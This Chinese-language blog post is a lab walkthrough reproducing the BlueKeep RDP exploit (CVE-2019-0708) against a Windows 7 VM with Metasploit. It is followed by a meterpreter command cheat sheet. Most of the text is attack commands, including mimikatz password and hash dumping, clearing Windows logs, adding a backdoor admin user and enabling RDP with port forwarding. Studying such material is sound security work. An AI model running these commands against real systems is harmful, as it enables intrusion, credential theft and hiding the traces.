0x00漏洞描述
Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。CVE-2019-0708是RDP协议的安全漏洞,具有蠕虫功能,因此危害很大。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。
0x01受影响的操作系统
· Windows 2003
· Windows XP
· Windows 7
· Windows Server 2008
·Windows Server 2008 R2
0x02复现环境
攻击机:Linux kali 2020.2(IP:192.168.61.158)
靶机:Windows 7 X64 (IP:192.168.61.139)
0x03复现过程
search CVE-2019-0708
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS 192.168.61.139
run/exploit #两个命令均可执行
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 192.168.61.139
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Exploit targets:
Id Name
----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
1、基本系统命令
sessions #sessions -h 查看帮助
sessions -i <ID值> #进入会话 -k 杀死会话
backgroud #将当前会话放置后台
run #执行模块输入run tab键按两次列出已有脚本
info #查看已有模块信息
getuid #查看权限
getpid #获取当前进程的pid
sysinfo #查看目标机系统信息
ps #查看当前活跃进程 kill<PID值> 杀死进程
idletime #查看目标机闲置时间
reboot/shutdown #重启/关机
shell #进入目标机cmd
clearav #清除windows中的应用程序日志
load/use #加载模块
2、文件命令
download #下载文件 download c:\\flag.txt
upload #上传文件 uplaod flag.txt c:\\flag\\
cat #查看文件内容 cat flag.txt
del #删除指定文件 del c:\\flag.txt
3.抓取密码
load mimikatz #加载mimikatz模块
kerberos #获取明文密码
tspkg #获取明文密码
wdigest #获取密码 跟kerberos相同
hashdump #获取哈希值
mimikatz_command -f samdump::hashes #获取哈希值
mimikatz_command -f sekurlsa::searchPasswprds #获取明文密码
4.getgui命令&enable_rdp
run getgui -h #查看帮助
run getgui -e #开启远程桌面
run getgui -u admin -p admin #添加用户
run getgui -f 1314 -e #3389端口转发为1314
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=1314 #将3389端口转发到1314
5、网络命令
ipconfig/ifconfig #查看IP
netstat #查看端口
route #查看路由
getproxy #查看代理信息
6、远程桌面
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接
rdesktop #远程桌面 rdesktop +ip需要在终端输入
本文分享自微信公众号 - 暗魂安全团队(anhunsec)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
来源:oschina
链接:https://my.oschina.net/u/4581882/blog/4481639